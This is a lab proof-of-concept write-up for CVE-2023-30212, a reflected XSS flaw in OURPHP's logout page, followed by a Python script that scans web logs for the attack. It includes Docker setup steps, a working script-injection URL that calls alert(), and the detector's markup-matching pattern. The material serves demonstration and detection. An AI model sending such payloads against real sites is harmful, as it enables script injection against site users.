CVE-2023-30212 is a security vulnerability that affects OURPHP versions up to and including 7.2.0. It allows Cross-Site Scripting (XSS) attacks.
OURPHP <= 7.2.0 is vulnerable to Cross-Site Scripting (XSS) via /client/manage/ourphp_out.php
-
Download the Dockerfile
-
Open a terminal in the folder where you downloaded the Dockerfile
-
Install Docker on your machine
kali@kali:~$ sudo apt install -y docker.io
-
Create a new Docker image (the trailing "." is the build context, the folder that holds the Dockerfile)
kali@kali:~$ docker build -t test .
-
Create a new Docker container
kali@kali:~$ docker run -d -p 80:80 test
-
Open a shell in the Docker container
kali@kali:~$ docker ps
Note the container ID from the output, for example 0ac7c99ad8e7
kali@kali:~$ docker exec -it 0ac7c99ad8e7 /bin/bash
root@0ac7c99ad8e7:/var/www/html#
You now have a shell inside the container
-
Set up the database
root@0ac7c99ad8e7:/var/www/html# mysql
Then type these commands:
-GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY 'naseef' WITH GRANT OPTION;
-FLUSH PRIVILEGES;
This MySQL/MariaDB statement grants all privileges on all databases and tables to the 'root' user.
The password is now set. Go to the website, enter the password and complete the configuration.
URL: http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(xss)</script>
The website is vulnerable to XSS: the script supplied in the URL parameter runs when you open this URL.
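-
To spot requests like this in web server logs, the following is an added example (not part of the original write-up or of OURPHP): it flags access-log lines where the out parameter of /client/manage/ourphp_out.php carries markup, after undoing percent-encoding. The combined log format, the markup pattern and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint and parameter named on this page for CVE-2023-30212.
VULN_PATH = "/client/manage/ourphp_out.php"
VULN_PARAM = "out"
# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumed heuristic: a logout redirect value should never carry markup.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|javascript:", re.I)

# Constructed sample lines (documentation IP range, made-up timestamp).
PREFIX = '203.0.113.5 - - [10/May/2023:10:00:01 +0000] "GET '
SAMPLE_LINES = [
    PREFIX + VULN_PATH + '?ourphp_admin=logout&out=%3C%2Fscript%3E%3Cscript%3Ealert(xss)%3C%2Fscript%3E HTTP/1.1" 200 512',
    PREFIX + VULN_PATH + '?ourphp_admin=logout&out=%253C%252Fscript%253E%253Cscript%253Ealert(xss)%253C%252Fscript%253E HTTP/1.1" 200 512',
    PREFIX + VULN_PATH + '?ourphp_admin=logout&out=index.php HTTP/1.1" 302 0',
    PREFIX + '/index.php?out=%3Cb%3E HTTP/1.1" 200 100',
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %253C and %3C both become '<'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_out_value(log_line):
    """Return the decoded `out` value if it carries markup, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if unquote(target.path) != VULN_PATH:
        return None
    # parse_qsl decodes once; fully_decode handles values encoded again.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        decoded = fully_decode(value)
        if name == VULN_PARAM and MARKUP_RE.search(decoded):
            return decoded
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged line."""
    hits = ((n, suspicious_out_value(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in hits if v is not None]
```

scan(SAMPLE_LINES) flags the first two lines (single and double percent-encoding of the same value) and leaves the ordinary logout request and the unrelated path alone.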